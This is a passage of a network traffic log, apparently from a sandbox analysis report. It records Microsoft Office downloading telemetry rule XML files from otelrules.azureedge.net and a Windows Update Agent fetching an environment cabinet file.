                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:48 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:48 GMT
                                Content-Type: text/xml
                                Content-Length: 958
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                ETag: "0x8DC582BA0A31B3B"
                                x-ms-request-id: 87286592-701e-0053-7b27-443a0a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165148Z-174f7845968kvnqxhC1EWRmf3g0000000t1000000000b3e4
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:48 UTC | 958 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                85 | 192.168.2.5 | 50056 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:50 UTC | 192 | OUT | GET /rules/rule700201v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:51 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:50 GMT
                                Content-Type: text/xml
                                Content-Length: 1393
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                ETag: "0x8DC582BE39DFC9B"
                                x-ms-request-id: 4793f8bc-701e-0053-5872-433a0a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165150Z-174f7845968px8v7hC1EWR08ng00000016bg00000000uwgf
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:51 UTC | 1393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                86 | 192.168.2.5 | 50053 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:50 UTC | 193 | OUT | GET /rules/rule224901v11s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:51 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:50 GMT
                                Content-Type: text/xml
                                Content-Length: 2284
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                ETag: "0x8DC582BCD58BEEE"
                                x-ms-request-id: a7f5da2f-b01e-0070-7a69-431cc0000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165150Z-174f784596886s2bhC1EWR743w00000016bg0000000004yn
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:51 UTC | 2284 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                87 | 192.168.2.5 | 50054 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:50 UTC | 192 | OUT | GET /rules/rule701201v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:51 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:50 GMT
                                Content-Type: text/xml
                                Content-Length: 1393
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                ETag: "0x8DC582BE3E55B6E"
                                x-ms-request-id: 68f80354-c01e-002b-0bf2-446e00000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165150Z-174f7845968glpgnhC1EWR7uec00000016b000000000hw3d
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:51 UTC | 1393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                88 | 192.168.2.5 | 50057 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:50 UTC | 192 | OUT | GET /rules/rule700200v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:51 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:50 GMT
                                Content-Type: text/xml
                                Content-Length: 1356
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                ETag: "0x8DC582BDF66E42D"
                                x-ms-request-id: 743f446d-301e-005d-68fb-44e448000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165150Z-174f784596886s2bhC1EWR743w000000164g00000000tmbp
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:51 UTC | 1356 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                89 | 192.168.2.5 | 50055 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:50 UTC | 192 | OUT | GET /rules/rule701200v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:51 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:50 GMT
                                Content-Type: text/xml
                                Content-Length: 1356
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                ETag: "0x8DC582BDC681E17"
                                x-ms-request-id: 7e2a4532-c01e-0049-6b07-41ac27000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165150Z-174f7845968pght8hC1EWRyvxg00000009ag00000000ggfc
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:51 UTC | 1356 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                90 | 192.168.2.5 | 50062 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:53 UTC | 192 | OUT | GET /rules/rule700051v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:53 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:53 GMT
                                Content-Type: text/xml
                                Content-Length: 1389
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE10A6BC1"
                                x-ms-request-id: c36c9036-001e-0014-67fa-445151000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165153Z-174f7845968cs2nkhC1EWR2tq000000001zg000000001rmq
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:53 UTC | 1389 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                91 | 192.168.2.5 | 50059 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:53 UTC | 192 | OUT | GET /rules/rule702350v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:53 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:53 GMT
                                Content-Type: text/xml
                                Content-Length: 1358
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                ETag: "0x8DC582BE6431446"
                                x-ms-request-id: ebed6b5e-401e-0015-4f72-400e8d000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165153Z-174f7845968glpgnhC1EWR7uec00000016e000000000481b
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:53 UTC | 1358 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                92 | 192.168.2.5 | 50060 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:53 UTC | 192 | OUT | GET /rules/rule701251v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:53 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:53 GMT
                                Content-Type: text/xml
                                Content-Length: 1395
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                ETag: "0x8DC582BDE12A98D"
                                x-ms-request-id: e61fb942-301e-000c-78b4-43323f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165153Z-174f7845968ljs8phC1EWRe6en000000161g00000000e6d4
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:53 UTC | 1395 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                93 | 192.168.2.5 | 50058 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:53 UTC | 192 | OUT | GET /rules/rule702351v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:53 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:53 GMT
                                Content-Type: text/xml
                                Content-Length: 1395
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                ETag: "0x8DC582BE017CAD3"
                                x-ms-request-id: 2eabf22f-f01e-005d-68dc-4313ba000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165153Z-174f7845968vqt9xhC1EWRgten000000166000000000q49b
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:53 UTC | 1395 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                94 | 192.168.2.5 | 50061 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:53 UTC | 192 | OUT | GET /rules/rule701250v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:53 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:53 GMT
                                Content-Type: text/xml
                                Content-Length: 1358
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                ETag: "0x8DC582BE022ECC5"
                                x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165153Z-174f78459688l8rvhC1EWRtzr00000000kwg000000002pqb
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:53 UTC | 1358 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                95 | 192.168.2.5 | 50065 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:55 UTC | 192 | OUT | GET /rules/rule702950v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:55 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:55 GMT
                                Content-Type: text/xml
                                Content-Length: 1368
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                ETag: "0x8DC582BDDC22447"
                                x-ms-request-id: 14abde1b-801e-0047-6aab-437265000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165155Z-174f7845968ljs8phC1EWRe6en0000001650000000001c1m
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:55 UTC | 1368 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                96 | 192.168.2.5 | 50063 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:55 UTC | 192 | OUT | GET /rules/rule700050v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:56 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:55 GMT
                                Content-Type: text/xml
                                Content-Length: 1352
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                ETag: "0x8DC582BE9DEEE28"
                                x-ms-request-id: 0e5d9e53-c01e-0066-77ee-44a1ec000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165155Z-174f7845968px8v7hC1EWR08ng00000016hg0000000038wq
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:56 UTC | 1352 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                97 | 192.168.2.5 | 50066 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:55 UTC | 192 | OUT | GET /rules/rule701151v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:56 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:55 GMT
                                Content-Type: text/xml
                                Content-Length: 1401
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                ETag: "0x8DC582BE055B528"
                                x-ms-request-id: e9f7249a-b01e-00ab-72be-42dafd000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165155Z-174f7845968kvnqxhC1EWRmf3g0000000t1g000000008x1h
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:56 UTC | 1401 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                98 | 192.168.2.5 | 50068 | 20.109.210.53 | 443 | |
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:55 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OuAA4CfBYWXbLdl&MD=SSg1k1Wh HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                Host: slscr.update.microsoft.com
                                2024-12-03 16:51:56 UTC | 560 | IN | HTTP/1.1 200 OK
                                Cache-Control: no-cache
                                Pragma: no-cache
                                Content-Type: application/octet-stream
                                Expires: -1
                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                MS-CorrelationId: f76feeae-ce4e-4ad3-bdd8-8600db2568db
                                MS-RequestId: 82ae44d8-b31f-4202-968f-2e6f0421a13a
                                MS-CV: 3e0y9cf41E2e0PXF.0
                                X-Microsoft-SLSClientCache: 1440
                                Content-Disposition: attachment; filename=environment.cab
                                X-Content-Type-Options: nosniff
                                Date: Tue, 03 Dec 2024 16:51:56 GMT
                                Connection: close
                                Content-Length: 30005
                                2024-12-03 16:51:56 UTC | 15824 | IN | Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                2024-12-03 16:51:56 UTC | 14181 | IN | Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                99 | 192.168.2.5 | 50067 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:55 UTC | 192 | OUT | GET /rules/rule701150v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:56 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:56 GMT
                                Content-Type: text/xml
                                Content-Length: 1364
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE1223606"
                                x-ms-request-id: c3f555e4-101e-0028-3c1d-418f64000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165156Z-174f7845968xlwnmhC1EWR0sv800000015yg00000000rzuu
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:56 UTC | 1364 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                100 | 192.168.2.5 | 50071 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:58 UTC | 192 | OUT | GET /rules/rule700401v2s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:58 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:58 GMT
                                Content-Type: text/xml
                                Content-Length: 1403
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                ETag: "0x8DC582BDCB4853F"
                                x-ms-request-id: 5c1224a4-501e-0029-53ee-44d0b8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165158Z-174f7845968j6t2phC1EWRcfe8000000168g00000000uc3u
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:58 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                101 | 192.168.2.5 | 50069 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:58 UTC | 192 | OUT | GET /rules/rule702201v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:58 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:58 GMT
                                Content-Type: text/xml
                                Content-Length: 1397
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                ETag: "0x8DC582BE7262739"
                                x-ms-request-id: 931d4756-e01e-001f-0f26-401633000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165158Z-174f78459684bddphC1EWRbht400000015w000000000qhua
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:58 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                102 | 192.168.2.5 | 50070 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:58 UTC | 192 | OUT | GET /rules/rule702200v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:58 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:58 GMT
                                Content-Type: text/xml
                                Content-Length: 1360
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                ETag: "0x8DC582BDDEB5124"
                                x-ms-request-id: b189b901-c01e-0079-3391-3fe51a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165158Z-174f7845968kvnqxhC1EWRmf3g0000000sw000000000xdt9
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:58 UTC | 1360 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                103 | 192.168.2.5 | 50072 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:58 UTC | 192 | OUT | GET /rules/rule700400v2s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:58 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:58 GMT
                                Content-Type: text/xml
                                Content-Length: 1366
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                ETag: "0x8DC582BDB779FC3"
                                x-ms-request-id: b7ec0bbd-e01e-0071-43ee-4408e7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165158Z-174f7845968swgbqhC1EWRmnb400000016cg000000009w9y
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:58 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


